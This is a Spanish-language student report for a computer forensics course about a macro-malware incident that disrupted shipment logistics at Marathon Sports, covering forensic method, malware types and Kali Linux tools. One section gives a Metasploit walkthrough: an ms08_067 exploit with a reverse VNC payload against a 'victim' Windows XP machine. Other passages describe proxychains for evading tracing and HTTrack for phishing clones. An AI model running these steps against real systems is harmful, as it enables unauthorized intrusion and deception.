Carrera: Tecnología en Gestión de Sistemas de la Información.
Nombre: Eddy Leonardo Larrea Criollo
Materia: Informática Forense
Actividad Nº2
Tema Propuesto:
LA EMPRESA MARATHON SPORTS TUVO UN INCIDENTE EN LA LOGÍSTICA DE RECEPCIÓN DE EMBARQUES A CAUSA DE UN MALWARE QUE AFECTO A LA BASE DE DATOS E INFORMACION.
Contenido
LA EMPRESA MARATHON SPORTS TUVO UN INCIDENTE EN LA LOGÍSTICA DE RECEPCIÓN DE EMBARQUES A CAUSA DE UN MALWARE QUE AFECTO A LA BASE DE DATOS E INFORMACION. 3
1. METODOLOGÍA DE LA INFORMÁTICA FORENSE 3
1.1. Delitos Informáticos 3
1.2. Tipos de Incidentes 3
1.3. Evidencia Digital 4
1.4. ¿Qué significa la evidencia? 4
1.5. Análisis Forense Informático 4
1.5.1. Adquisición de Datos: 4
1.5.2. Análisis de Investigación: 5
1.5.3. Redacción del Informe: 5
1.5.3.1. Informe ejecutivo: 5
1.5.3.2. Informe Técnico: 6
2. TÉCNICAS DE LA INFORMÁTICA FORENSE 6
2.2. Programa: 6
2.2.1. Técnicas de Hacking: 6
2.2.1.1. Descripción: 6
2.2.1.2. Ejemplo con Xploits (explotar vulnerabilidades de Windows): 6
2.2.2. Herramientas usadas por los Atacantes: 7
2.2.3. Análisis: 7
2.2.4. Herramientas para los administradores: 7
3. DESCRIPCION DEL MALWARE QUE AFECTO A LA BASE DE DATOS E INFORMACION 7
3.1. Malware: 7
3.2. Tipos de Malware: 8
4. MEDIOS POR DONDE INGRESA EL MALWARE 10
5. VULNERABILIDADES DE LA RED 15
5.1. TIPOS DE INTRUSO 15
6. METODOLOGIA DE LA NIST` 17
7. TECNICAS DE SOFTWARE PARA UN ANALISIS FORENSE 17
8. ANTIVIRUS 17
8.1. Cómo Funcionan?: 18
8.2. Tipos de Antivirus: 18
9. SOFTWARE UTILIZADO KALI LINUX 19
9.1. Que es Software?: 19
9.2. Software Kali Linux: 19
9.3. Distribuciones y herramientas que incluye Kali Linux: 20
9.4. Herramientas necesarias para tareas específicas. 20
9.5. Uso de Herramienta NBTSCAN: 23
Ilustración 1: Fases de un Análisis Forense 3
Ilustración 2: Tipos de Malware 6
Ilustración 3: Triangulo de la Intrusión 15
Ilustración 4: Herramientas utilizadas para un Análisis Forense 16
Ilustración 5: Kali Linux Security 18
LA EMPRESA MARATHON SPORTS TUVO UN INCIDENTE EN LA LOGÍSTICA DE RECEPCIÓN DE EMBARQUES A CAUSA DE UN MALWARE QUE AFECTO A LA BASE DE DATOS E INFORMACION.
Exposición de lo suscitado:
El jueves 8 y Viernes 9 de Febrero del 2018 la Empresa Marathon Sports presentó un incidente en la logística de recepción de Embarques, ya que aquellos Contenedores que llegaron al Centro de Distribución no tenían fechas asignadas y autorización de arribo como a su vez la información respectiva para el descargue, causando malestar a las Empresas de las Marcas Mayoristas (MEDEPORT: ADIDAS, EQUINOX: NIKE) por la demora de procesos en su mercadería.
El motivo por falta de información es a causa de un malware alojado en el Computador que causo la infección en los archivos de información y base de datos ocasionando efectos molestos, destructivos e incluso irreparables sin el consentimiento y/o del usuario.
METODOLOGÍA DE LA INFORMÁTICA FORENSE
Delitos Informáticos
Son actos criminales en los cuales se encuentran involucrados las computadoras:
Delitos directamente contra computadoras
Delitos donde la computadora contiene evidencia
Delitos donde la computadora es utilizada para cometer el crimen
Tipos de Incidentes
Robo de Propiedad intelectual
Fraude
Distribución de Virus
Denegación de servicios
Extorsión
Estafa
Acceso no autorizado
Robo de Servicios
Abuso de Privilegios
El análisis forense informático se aplica una vez que tenemos un incidente y queremos investigar qué fue los que pasó, quien fue y como fue.
Evidencia Digital
La evidencia computacional es única, cuando se la compara con otras formas de "evidencia documental".
A diferencia de la documentación en papel, la evidencia computacional es frágil y una copia de un documento almacenado en un archivo es idéntica al original.
Otro aspecto único de la evidencia computacional es potencial de realizar copias no autorizadas de archivos, sin dejar rastro de que se realizó una copia.
¿Qué significa la evidencia?
Requiere tener un conocimiento general profundo.
Como la evidencia es creada.
Se puede falsificar.
Qué información se puede obtener.
Qué puede estar mal.
CASO log UNIX wtmp – Acceso de usuarios.
CASO DHCP – Asignacion de Direcciones.
Análisis Forense Informático
"Es la técnica de capturar, procesar, e investigar información procedente de sistemas informáticos utilizando una metodología con el fin de que pueda ser utilizada en la justicia".
Rodney McKennish, report, "1998 Donald Mackay Churchill Fellowship to Study Overseas Developments in Forensic Computing" (Australia)
La informática forense se encarga de analizar sistemas informáticos en busca de evidencia que colabore a llevar adelante una causa judicial o una negociación extrajudicial.
Ilustración 1: Fases de un Análisis Forense
Adquisición de Datos:
La adquisición de datos es una de las actividades más críticas en el análisis forense. Dicha criticidad es debida a que, si se realizase mal, todo el análisis e investigación posterior no sería válido debido a que la información saldría con impurezas, es decir, la información que creemos que es del origen no lo es realmente.
Una vez que se ha detectado un incidente de seguridad, uno de los primeros problemas del analista en la recogida de datos se resume en decir si el equipo hay que apagarlo o no.
Análisis de Investigación:
La fase de análisis e investigación de las evidencias digitales es un proceso que requiere obviamente un gran conocimiento de los sistemas a estudiar. Las fuentes de recogida de información en esta fase son varias:
Registros de los sistemas Analizados.
Registro de los detectores de intrusión.
Registro de los cortafuegos.
Ficheros del sistema analizado.
En el caso de los ficheros del sistema analizado, hay que tener cuidado con las carpetas personales de los usuarios. Dichas carpetas están ubicadas en el directorio /home en sistemas GNU/Linux y en c:\documents and settings\ en sistemas Windows con tecnología NT (Windows 2000, XP, etc.).
Hay que tener en cuenta que no se consideran personales aquellas carpetas que han sido creadas por defecto en la instalación del sistema operativo, por ejemplo, las cuentas de administrador. De todas formas, siempre es recomendable asesorarse con un jurista ante la realización de un análisis forense para prevenir posibles situaciones desagradables (por ejemplo: ser nosotros los denunciados por incumplir la legislación).
Redacción del Informe:
La redacción del informe es una tarea ardua a la par que compleja, porque no sólo hay que recoger todas las evidencias, indicios y pruebas recabados sino que, además, hay que explicarlos de una manera clara y sencilla. Hay que tener n cuenta que muchas veces dichos informes van a ser leídos por personas sin conocimientos técnicos y obviamente tiene que ser igual de riguroso y debe ser entendido, con lo que habrá que explicar minuciosamente cada punto.
Todo informe deberá tener perfectamente identificada la fecha de finalización de éste, así como a las personas involucradas en su desarrollo.
Aunque a continuación explicaremos los dos tipos de informes que hemos mencionado anteriormente (informe ejecutivo e informe técnico) en ciertas situaciones se pueden unificar en uno dependiendo del caso y de la situación, aunque no es recomendable.
Informe ejecutivo:
Los principales lectores de los informes ejecutivos son la alta dirección de las empresas, organismos, etc.; es decir, personas que no tienen un perfil técnico.
Por tanto, el lenguaje del informe no debe ser muy técnico y, si se utiliza alguna jerga técnica, tiene que ser explicada de una manera clara.
Introducción: se describe el objeto del informe así como el coste del incidente acaecido.
Descripción: se detalla que ha pasado en el sistema de una manera clara y concisa sin entrar en cuestiones muy técnicas. Hay que pensar que dicho informe será leído por personal sin conocimientos técnicos o con muy escasos conocimientos.
Recomendaciones: se describen las acciones que se deben realizar una vez comprobado que se ha sufrido una incidencia para evitar otra incidencia del mismo tipo, así como si debe ser denunciado.
Informe Técnico:
En este tipo de informe sus principales lectores son personas con un perfil técnico (ingenieros, técnicos superiores, etc.), siendo el objetivo del informe describir qué ha ocurrido en el sistema. El informe debe contener al menos los siguientes puntos:
Introducción: donde se describe el objeto principal del informe y se detallan los puntos fundamentales en que se disecciona el informe.
Preparación del entorno y recogida de datos: se describen los pasos a seguir para la preparación del entorno forense, la adquisición y verificación de las imágenes del equipo afectado, etc.
Estudio forense de las evidencias: en este punto se describe la obtención de las evidencias así como de su significado.
Conclusiones: donde se describen de una manera detallada las conclusiones a las que se han llegado después de haber realizado el análisis.
TÉCNICAS DE LA INFORMÁTICA FORENSE
Objetivos: Conocer las técnicas que utilizan los atacantes y sus herramientas, aprender a buscar evidencias y signos de intrusión.
ORIENTADO A: Técnicos de seguridad, sistemas y redes.
REQUISITOS: Conocimientos de seguridad informática.
Programa:
Técnicas de Hacking:
Vulnerabilidades, búsqueda, análisis y explotación.
Herramientas de seguridad.
Descripción:
Son Técnicas y procedimientos utilizados por un "Hacker" para un determinado Objetivo, normalmente son procedimientos ilegales.
Ejemplo con Xploits (explotar vulnerabilidades de Windows):
Antes de lanzar cualquier exploit es recomendable que conozcamos las ip's conectadas a nuestra red, para ello:
Linux:
Código:
sudo nmap -sS -O 192.168.1.0-255
-sS --> Escaneamos de forma silenciosa
-O --> Para que nos muestre el Sistema Operativo
Windows:
Código:
net view
Aparte de esto aconsejo también el uso de la herramienta Colasoft MAC Scanner para el escaneo de pc's conectadas a la red.
Ejecutamos el msfconsole de Metasploit Framework.
Una vez que conocemos las ip's y sus respectivos Sistemas Operativos, para utilizar el primer exploits vamos a intentar localizar algún Windows XP (Recomendable que para ver si el pc está conectado hagamos ping a su ip)
Primer exploit (netapi)*
Código:
use windows/smb/ms08_067_netapi
set RHOST (ip equipo remoto)
set payload windows/vncinject/reverse_tcp
set LHOST (ip equipo nuestro)
exploitSe nos abrirá una pantalla remota con el pc víctima.
Herramientas usadas por los Atacantes:
Scanners y exploits.
Rootkits.
Análisis:
Cómo actuar ante un ataque.
Notas legales.
Análisis de huellas y localización de información en Windows y UNIX
Análisis de logs.
Herramientas para los administradores:
Herramientas de filtrado, alarmas en tiempo real y Honeypots.
Buenas practicas, securización de entornos y parcheo.
DESCRIPCION DEL MALWARE QUE AFECTO A LA BASE DE DATOS E INFORMACION
Malware:
El malware o software malicioso es un tipo de software que tiene como objetivo infiltrarse o dañar un sistema de información sin el consentimiento de su propietario.
El término se utiliza para hablar de todo tipo de amenazas informáticas o software hostil, y existen distintos tipos de malware en función de su origen y consecuencias. Entre ellos nos encontramos con los virus, gusanos, troyanos, keyloggers, botnets, spyware, adware, ransomware y sacareware. (ilustración 1)
Ilustración 2: Tipos de Malware
Tipos de Malware:
Virus Informático: Existen diferentes tipos de virus informáticos que pueden clasificarse según su origen, las técnicas que utilizan, los tipos de archivo que infectan, dónde se esconden, el tipo de daño que provocan, o el tipo de sistema operativo o plataforma que atacan.
Virus informáticos residentes de memoria.
Virus de Acción Directa.
Virus de Sobreescritura.
Virus de sector de Arranque.
Macro Virus.
Virus Polimórfico.
Virus Fat.
Virus de secuencias de comando WEB.
Un virus informático es un sistema de software dañino, escrito intencionadamente para entrar en una computadora sin permiso o conocimiento del usuario. Tiene la capacidad de replicarse a sí mismo, continuando así su propagación. Algunos virus no hacen mucho más que replicarse, mientras que otros pueden causar graves daños o afectar negativamente el rendimiento de un sistema. Un virus nunca debe ser considerado como inofensivo y dejarlo en un sistema sin tomar medidas.
Gusano Informático: El gusano informático es otro de los tipos de malware más comunes en la red, y su principal diferencia con los virus informáticos es que no necesita la intervención del usuario ni la modificación de ningún archivo existente para infectar un equipo. Por lo demás, tiene la característica de replicarse a sí mismo para expandirse por las redes a las que está conectado un dispositivo.
Cuando consigue penetrar en un equipo, el gusano intenta obtener las direcciones de otros ordenadores mediante tus listas de contactos para enviarles sus copias y tratar de infectarlos también. No tienen por qué manipular ningún programa ni hacer que el ordenador funcione incorrectamente, lo que los hace un poco más difíciles de detectar.
Troyano: El troyano tiene algunas semejanzas con los virus informáticos, pero su funcionamiento no es exactamente el mismo. Mientras que un virus suele ser destructivo, un troyano trata de pasar desadvertido mientras accede a tu dispositivo con la intención de ejecutar acciones ocultas con las que abrir una puerta trasera para que otros programas maliciosos puedan acceder a él.
Sin embargo, uno de los puntos en común entre varios tipos de malware es que los troyanos también llegarán a ti disfrazados de archivos legítimos. Lo harán con ejecutables que aparentemente no harán nada malo al ser utilizados, pero que enseguida empezarán a trabajar a tus espaldas sin que te des cuenta.
Spyware: Se trata de otro tipo de programa que se instala en tu equipo por sí sólo o mediante la interacción de una segunda aplicación que lo lanza sin que te des cuenta. Suelen trabajar a escondidas tratando de ocultar su rastro para que no levantes la guardia y actúes con normalidad.
Su finalidad es la de recolectar información sobre el usuario u organización dueña de un ordenador de forma no autorizada. De forma que no sean detectados, estos programas monitorizan y recopilan datos sobre las acciones realizadas en un equipo, el contenido del disco duro, las aplicaciones instaladas o todo lo que hacen en Internet. También pueden llegar a instalar otras aplicaciones.
Adware: El adware es un tipo de programa bastante polémico y difícil de catalogar. Algunos lo consideran una clase de spyware, mientras que otros aseguran que ni siquiera puede ser considerado un malware porque su intención final no es la de dañar los ordenadores principales.
Su única misión es la de meterse en tu ordenador y empezar a mostrarte publicidad, ya sea mientras estás navegando por internet, a forma de popup en momentos aleatorios o durante la ejecución de un programa. Los hay incluso que se limitan a sustituir la publicidad de una web por otra propia con la que sus creadores pueden obtener beneficios.
Por lo general, este tipo de software suele instalarse en programas que después se difunden gratuitamente como una fuente de ingresos para sus creadores. La razón por la que algunas personas los consideran spyware, es porque algunos de ellos pueden recolectar y enviar tus datos personales.
Ransomware: Ransom quiere decir rescate en inglés, y de hecho lo que hace es secuestrar los datos de un ordenador y pedir un rescate económico a cambio de liberarlo. Normalmente lo que hace es cifrar tus datos, y lo que te ofrecen a cambio del rescate económico es la clave para poder descifrarlos.
Este tipo de programas puede acceder a tu ordenador a lomos de un gusano informático u otro tipo de malware, y una vez cifre tus datos bloqueará tu ordenador mostrándote una pantalla de advertencia en la que se te informa que has sido víctima del ataque. En esa pantalla se te muestra también la cantidad a pagar y el método de pago, que puede ser por SMS, Paypal o mediante bitcoins.
Se trata de una de las amenazas que más está creciendo en los últimos años, por lo que es importante tener tu ordenador siempre actualizado y seguir una serie de precauciones a la hora de enfrentarte a correos electrónicos o mensajes sospechosos, evitando siempre instalar nada que te manden por correo personas que no conozcas.
Keylogger: Un keylogger (derivado del inglés: key ('tecla') y logger ('registrador'); 'registrador de teclas') es un tipo de software o un dispositivo hardware específico que se encarga de registrar las pulsaciones que se realizan en el teclado, para posteriormente memorizarlas en un fichero o enviarlas a través de internet .
Botnet: La palabra botnet se forma con los términos ingleses "robot" y "network" (red). Los cibercriminales usan virus troyanos especiales para vulnerar la seguridad de las computadoras de varios usuarios, tomar el control de cada computadora y organizar todas las máquinas infectadas en una red de "bots" que el delincuente puede administrar de manera remota.
A menudo, el cibercriminal busca infectar y controlar miles, decenas de miles o incluso millones de computadoras para poder actuar como el amo de una gran "red zombi" (o "red de bots") que es capaz de orquestar un ataque de denegación de servicio distribuida (DDoS), una campaña de spam a gran escala u otros tipos de ciberataques.
Exposición de los archivos que afecto el Malware en la EMPRESA MARATHON SPORTS:
El miércoles 7 de Febrero del 2018 a las 17:30 el malware se alojó en el computador de Logística donde se encontraba la información necesaria de los Embarques próximos Arribar al CD.
Archivos afectados:
- Base de datos (archivo Excel macros) contenía las Fechas, Empresa, Nombres de Embarques, Línea del producto, Cantidades, Distribuciones, Numero de Orden y documentación extra para proceder con la asignación y autorización de llegada al CD.
- Información necesaria para realización de Listados de recepción (archivos excel), el cual contenía el Nombre de la Empresa, Fecha de Arribo, Número de Orden del sistema, detalles de Items internacionales, detalle de Códigos JDE, Descripciones, Cantidades, distribuciones por Almacenes y las Observaciones respectivas como eventos o promociones.
MEDIOS POR DONDE INGRESA EL MALWARE
Aceptar las solicitudes que se presentan en anuncios o ventanas emergentes y que indican que tu ordenador está infectado o que necesita un antivirus único. Este tipo de indicaciones suelen aparecer al instalar o actualizar un tercer programa, y se sugiere que si instalas algo desde Internet, debe ser de manera personalizada para asegurar que no se agregue ningún virus o programa malicioso durante el proceso.
Asegúrate de descargar el software que necesites para tí o para tu negocio desde una fuente confiable y ejecútalo
mediante los escaneos de antivirus correspondientes y con el spyware adecuado. Lee todas las indicaciones sobre el programa que estás instalando y si es necesario, puedes verificar si un sitio web es fiable utilizando herramientas como WOT.
La apertura de archivos adjuntos de correo electrónico, como regla general, no debe producirse con aquellos que no esperas recibir. Los equipos pueden infectarse cuando los usuarios abren archivos adjuntos de correo electrónico que contienen códigos maliciosos. Aunque el mensaje sea de un compañero de trabajo, amigo o miembro de la familia, ten cuidado antes de abrir un enlace o descargar un archivo adjunto que no esperas.
Cualquier Red abierta, disco duro, o memoria USB conectado al ordenador personal o de empresa puede contener diferentes tipos de virus. Es una táctica común de los hackers obtener acceso a una red mediante una serie de códigos presentes en una unidad pendrive, y son capaces de infectar todo el sistema con un virus o un troyano.
Visitando enlaces desconocidos corremos el peligro de acabar en un sitio web que podría acceder a tu ordenador mediante archivos maliciosos u obtener todo tipo de información sobre nuestro sistema. Abre con cuidado aquellos chats, correos electrónicos o SMS que resulten sospechosos, ten cuidado incluso con las URL que parecen legítimas y comprueba toda la información a la que hacen referencia.
Ejecutar las actualizaciones más recientes también debe hacerse de forma razonable, tratando con cautela especialmente aquellas asociadas a Microsoft Windows u orientadas a la seguridad. Mantén siempre actualizado el sistema operativo, los programas y los complementos de tu navegador que igualmente pueden ser vulnerables. Ejecuta herramientas que sirvan para comprobar los complementos instalados y sus versiones.
El software pirata contenido en aplicaciones como BitTorrent para el intercambio ilegal de música, películas o software protegido por derechos de autor, puede ser otro riesgo a tener en cuenta. A veces estos archivos y programas contienen virus, spyware, troyanos o software malicioso.
Detalle Gráfico del Malware que pudo haber ingresado al Computador (PC de LOGISTICA) de la EMPRESA MARATHON SPORTS:
El miércoles 7 de Febrero del 2018 a las 17:30 el virus se alojó en el computador de Logística donde se encontraba la información necesaria de los Embarques próximos Arribar al CD.
Archivos afectados:
- Base de datos (archivo Excel macros)
- Información necesaria para realización de Listados de recepción (archivos excel)
En Packet Tracer observamos la Estructura de envió de archivos mediante TCP y IMCP los mismos que se encuentran bloqueados por el FIREWALL, ya que era imposible él envió y recepción de archivos.
IMCP: El protocolo de mensajes de control de Internet (en inglés: Internet Control Message Protocol y conocido por sus siglas ICMP) es el sub protocolo de control y notificación de errores del Protocolo de Internet (IP). Como tal, se usa para enviar mensajes de error, indicando por ejemplo que un router o host no puede ser localizado. También puede ser utilizado para transmitir mensajes ICMP Query.
TCP: (Transmission Control Protocol) Protocolo de Control de Transmisión.: Este protocolo se encarga de crear "conexiones" entre sí para que se cree un flujo de datos. Este proceso garantiza que los datos sean entregados en destino sin errores y en el mismo orden en el que salieron. También se utiliza para distinguir diferentes aplicaciones en un mismo dispositivo.
- El antivirus ESET NOD32 instalados en el Área de Logística estaba actualizados y cumplía con las normativas respectivas.
Los Puertos USB o medios extraíbles estaban bloqueados por seguridad.
CONCLUSION: El Malware que ingreso al Computador de Procesos de Logística pudo ser introducido por algún intruso que labora dentro de la Empresa, ya que las seguridades estaban cumpliendo con las normativas.
En Este Grafico podemos Observar que el FIREWALL fue deshabilitado e ingresaron el Malware para causar daños a la información.
Exposición del efecto que causo el VIRUS MACRO en la EMPRESA MARATHON SPORTS:
El miércoles 7 de Febrero del 2018 a las 17:30 el virus se alojó en el computador de Logística donde se encontraba la información necesaria de los Embarques próximos Arribar al CD.
Consecuencias del Virus Macro:
El Virus Macro afecto a los archivos antes mencionados ocasionando en el CD lo siguiente:
Los Jefes del CD no tenían el Informe General para analizar el espacio de recepción en el CD y autorizar la llegada de los Embarques.
El Área de Transferencias tuvo pérdida de tiempo en recursos, ya que el personal estaba esperando dicha información para proceder con el descargue, separación de categorías, líneas, colocación de precios/tickets, repartición del producto, transferencias a los Almacenes (guardado - conteo) y carga a los Camiones para su respectivo envió.
El Área de descarga no tenía los informes para cuadrar los Embarques y reportar los faltantes y sobrantes si existiesen.
El Área de logística buscaba alternativas para realizar nuevos informes en otras computadoras que no se encuentren infectadas del virus macro.
VULNERABILIDADES DE LA RED
En seguridad informática, la palabra vulnerabilidad hace referencia a una debilidad en un sistema permitiendo a un atacante violar la confidencialidad, integridad, disponibilidad, control de acceso y consistencia del sistema o de sus datos y aplicaciones.
El análisis de la vulnerabilidad, a veces llamado exploración de la vulnerabilidad, es el acto de determinar qué agujeros y vulnerabilidades de la seguridad pueden ser aplicables a la red de la blanco. Para hacer esto, examinamos las máquinas identificadas dentro de la red de la blanco para identificar todos los puertos abiertos y los sistemas operativos y los usos que los anfitriones están funcionando (número de versión incluyendo, nivel del remiendo, y paquete del servicio). Además, comparamos esta información con varias bases de datos de la vulnerabilidad del Internet para comprobar qué vulnerabilidades y hazañas actuales pueden ser aplicables a la red de la blanco.
La evaluación de vulnerabilidades es un factor clave en la seguridad de la información en una compañía. Día a día se encuentran vulnerabilidades en diferentes Sistemas Operativos, Sistemas o Aplicaciones informáticas, Programa de correo electrónico, entre otros.
TIPOS DE INTRUSO
Hackers: Se trata de intrusos que se dedican a esto como pasatiempo y reto técnico. Normalmente no suelen causar daños al sistema, pero pueden acceder a datos confidenciales. Son personas con grandes conocimientos en lenguajes de programación y sistemas, invierten mucho tiempo al día en esto.
Crackers: Su objetivo es atacar sistemas informáticos de forma ilegal con algún beneficio o para provocar algún daño a la propiedad del sistema, ya sea por intereses políticos, religiosos, etc…
Sniffers: Intrusos que se dedican a rastrear y descifrar mensajes que circulan por una red.
Phreakers: Intrusos especializados en sabotear y descifrar redes telefónicas para poder realizar llamadas telefónicas gratuitas.
Spammer: Son los artífices del envío de miles de mensajes de correo electrónico no solicitado mediante redes como puede ser internet, provocando una sobrecarga en los servidores de correo y colapso en los buzones de correo.
Amenazas del Personal Interno: Este tipo de ataques los realiza el propio personal de la organización o red, mediante accesos a ciertas partes de la red con propósitos de curiosidad pero con el riesgo de poder alterar datos en caso de acceso consumado. Hay que tener en cuenta también a los exempleados
Ilustración 3: Triangulo de la Intrusión
METODOLOGIA DE LA NIST`
El NIST fue fundado en 1901 como una agencia federal que forma parte del Departamento de Comercio de los Estados Unidos. Su misión es elaborar y promover patrones de la medición, los estándares y la tecnología con el fin de crear productividad, facilitar el comercio y mejorar la calidad de vida.
Este instituto lleva a cabo un proyecto para el testeo de herramientas de análisis forense de ordenadores (computer forensic tool testing, CFTT).
Su principal objetivo es la certificación de herramientas de hardware y software con el fin de asegurar que su uso ofrece resultados fiables.
TECNICAS DE SOFTWARE PARA UN ANALISIS FORENSE
Existe actualmente en el mercado, una amplia diversidad de productos software para forense digital. Algunas son herramientas genéricas las cuales proporcionan una variedad de funciones. Otras son más enfocadas en servir a un propósito más limitado. Estas aplicaciones tienden a enfocarse en un tipo muy específico de evidencia, por ejemplo correo electrónico o Internet.
Cuando se selecciona software, la elección necesita ser hecha entre ir con herramientas open source o productos comerciales. Existen ventajas y desventajas en ambos. Factores como el costo, funcionalidad, capacidades, y soporte son algunos de los criterios a ser utilizados para hacer esta decisión
A continuación se muestran algunas de las herramientas que se utilizan en un análisis forense.
Ilustración 4: Herramientas utilizadas para un Análisis Forense
ANTIVIRUS
Los antivirus son programas cuyo objetivo es detectar o eliminar virus informáticos. Con el transcurso del tiempo, la aparición de sistemas operativos más avanzados e internet, los antivirus han evolucionado hacia programas más avanzados que además de buscar y detectar virus informáticos consiguen bloquearlos, desinfectar archivos y prevenir una infección de los mismos. Actualmente son capaces de reconocer otros tipos de malware como spyware, gusanos, troyanos, rootkits, etc.
Cómo Funcionan?:
Normalmente, los antivirus monitorizan actividades de virus en tiempo real y hacen verificaciones periódicas, o de acuerdo con la solicitud del usuario, buscando detectar y, entonces, anular o remover los virus de la computadora.
Los antivirus actuales cuentan con vacunas específicas para decenas de miles de plagas virtuales conocidas, y gracias al modo con que monitorizan el sistema consiguen detectar y eliminar los virus, worms y trojans antes que ellos infecten el sistema.
Esos programas identifican los virus a partir de "firmas", patrones identificables en archivos y comportamientos del ordenador o alteraciones no autorizadas en determinados archivos y áreas del sistema o disco rígido.
El antivirus debe ser actualizado frecuentemente, pues con tantos códigos maliciosos siendo descubiertos todos los días, los productos pueden hacerse obsoletos rápidamente. Algunos antivirus pueden ser configurados para que se actualicen automáticamente. En este caso, es aconsejable que esta opción esté habilitada.
Tipos de Antivirus:
Norton Internet Security: Es el mejor para la seguridad al navegar por internet. Una de sus principales características es la detección de 'malware', la cual se basa en el análisis de su comportamiento como una amenaza.
Kaspersky Internet Security: Provee de una adecuada seguridad a los usuarios mientras se encuentran conectados y desconectados de internet. Tiene un gran desempeño en la detección de 'malware'.
AVG Internet Security: Es muy confiable en términos de detección de virus y su desinfección. No es muy costoso pero su punto débil es su complicada interface que complica su uso.
PC Tool Internet Security: A pesar de que se han hecho muchas mejoras a través de los años, aún tiene deficiencias. Carece de términos de control para padres y de una opción de ayuda en línea.
BitDefender Internet Security: Provee de una fuerte protección a sus usuarios. A pesar de su alta capacidad para identificar y eliminar amenazas, aún sigue dejando rastros en su trabajo, lo cual le resta efectividad.
Alwil Avast Internet Security: Posee muy buenas funciones para la seguridad en internet. Su capacidad disminuye al momento de detectar nuevas amenazas. No contiene algunas funciones vitales.
McAfee Internet Security: Tiene gráficos únicos y actualizados que lo hacen mejor que los demás. Es intuitivo pero la desventaja frente al resto es que vuelve más lento el desempeño del sistema.
Panda Internet Security: Provee de todas las funciones básicas de seguridad. Es muy seguro con los dispositivos USB conectados a la PC y nos da la posibilidad de tener 2Gb de backup en línea.
Webroot Internet Security: El antivirus viene equipado con un paquete de antispyware, firewall y antispam. Para los usuarios más frecuentes, este software falla en las funciones del control parental.
Trend Micro Internet Security: Está totalmente equipado con seguridad para el escritorio de la PC. La desventaja está en el precio y en su pobre desempeño al momento de detectar 'malware'.
SOFTWARE UTILIZADO KALI LINUX
Que es Software?:
Es una palabra que proviene del idioma inglés, pero que gracias a la masificación de uso, ha sido aceptada por la Real Academia Española. Según la RAE, el software es un conjunto de programas, instrucciones y reglas informáticas que permiten ejecutar distintas tareas en una computadora.
Software Kali Linux:
Kali Linux es la versión mejorada y renovada de la distro BackTrack, creada por Offensive Segurity. La distro se basa en Debian, mientras que Backtrack se fijó en Ubuntu para la creación de su programación.
Su principal objetivo es poner a disposición del usuario, las mejores herramientas para trabajar la auditoría en internet y contar con un potente sistema de seguridad informática ante los peligros que puedan existir.
Ilustración 5: Kali Linux Security
Distribuciones y herramientas que incluye Kali Linux:
Una ventaja que proporciona el GNU/Linux a tu pc, es que te permite adaptarlo para conseguir las herramientas necesarias adaptadas a las tareas específicas que queremos realizar. Partiendo de las aplicaciones o software más generalista (como un navegador web o un visor de imágenes) podemos ir personalizando el sistema con las aplicaciones que necesitemos para realizar auditorías informáticas, pentest o tests de intrusión como (Zenmap, Nmao, Oswap ZAP, Armitage,Aircrack-ng., etc).
De esta forma, en Linux encontrarás distros con opciones tan variadas como reproducir música, visualizar archivos multimedia, o redactar documentos. Todas estas funciones estarán a tu alcance, sin necesidad de descargar ningún software adicional en tu ordenador.
También existen distros especializadas según campos temáticos. Por ejemplo, en cuanto a la seguridad informática, encontramos el programa Kali Linux que te ofrece distintas herramientas para auditar tu sistema operativo y protegerle ante posibles ataques de hackers profesionales.
Sólo en este ámbito, podemos encontrar más de 300 aplicaciones que se encargan de velar por la seguridad a través del sistema Kali Linux. Entre todas las que existen, cabe destacar Nmap que controla los puertos de acceso a la red.
Herramientas necesarias para tareas específicas.
MacChanger ( Cambia la dirección MAC): Cambiar la dirección física de nuestro adaptador de red es una tarea sumamente útil en los test de penetración aquí la explicación de cómo se utiliza ésta herramienta y para qué:
Podemos cambiar la dirección física de nuestro adaptador de red por ejemplo para saltarnos el filtrado MAC de un router o dispositivo en concreto, posee multiples opciones como crear direcciones random o elegir la MAC según la marca que fabricó el dispositivo, entre algunas otras.
ProxyChains: ProxyChains es una herrmienta que te permite establecer un proxy para cada acción o comando que vayas a realizar, permitiéndote navegar a traves de uno o varios proxies y así evitando ser rastreado en internet.
Por ejemplo si quisiera lanzar un análisis Nmap sobre un equipo en concreto pero no quiero conectarme desde mi dirección IP directamente utilizaría el comando proxychains de la siguiente forma:
~$ proxychains nmap 74.125.68.101 -v -T4
Sin embargo, cabe destacar que para utilizarlo debemos configurar previamente algunos parámetros en su archivo de configuración, como la dirección del proxy o proxies que queremos utilizar.
Traceroute: Es una herramienta de diagnóstico de red capaz de mostrar la ruta completa de una conexión, así como medir los retrasos de tránsito de los paquetes enviados a través de una red IP.
Nmap: Network Mapper o Nmap es una herramienta utilizada para la detección de redes y las auditorias de seguridad. Una de las opciones mas potentes de las muchas que tiene, es el modificador: " - script vuln" que hace que NMap escanee y audite la seguridad de todos los puertos abiertos con la herramienta NSE.
Por ejemplo:
~$ nmap kali.org --script vuln
Para ver una lista completa de la sintaxis y los modificadores que la herramienta admite:
~$ nmap –help
HTTRACK: Es un clonador de páginas web que nos permitirá copiar todo el código de un sitio web. Desde la perspectiva de un test de penetración, se utiliza principalmente para suplantar la identidad de un sitio real, y crear lo que se denomina un phising en un servidor atacante. Para ejecutar la herramienta basta con teclear en nuestro terminal $ httrack
Una vez lanzado, el asistente nos solicitará algunos datos como el nombre del proyecto, su ruta base, el destino de la url y la configuración del proxy.
Aircrack-ng: Es una de las mejores herramientas inalámbricas para hackear contraseñas para el craqueo WEP/WAP/WPA2 utilizado en todo el mundo.
Funciona al tomar paquetes de la red, lo analiza a través de contraseñas recuperadas. También posee una interfaz de consola. Además de esto, Aircrack-ng también utiliza el ataque estándar de FMS (Fluhrer, Mantin y Shamir) junto con algunas optimizaciones como los ataques KoreK y el ataque PTW para acelerar el ataque, que es más rápido que el WEP.
SMBMap: Es una herramienta que nos permitirá enumerar recursos compartidos samba a lo largo de un dominio. Y no sólo eso, enumera contenidos y permisos, soporta pass-the-hash, descarga/sube/borra ficheros, busca patrones de nombres de fichero con la opción de auto descargarlos e incluso ejecuta comandos en remoto.
NBTSCAN:
Busca en la red nodos que tengan el servicio NetBios activado y muestra información de ellos (por ejemplo el Nombre, IP, MAC, etc). Es similar al programa ipscan pero en modo consola.
nbtscan nbtscan 192.168.1.0-6 busca en el rango establecido (de la .1 a la .6) nodos con el protocolo NetBios activado.
# nbtscan 192.168.1.0-6
Doing NBT name scan for addresses from 192.168.1.0-6
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.1.0 Sendto failed: Permission denied
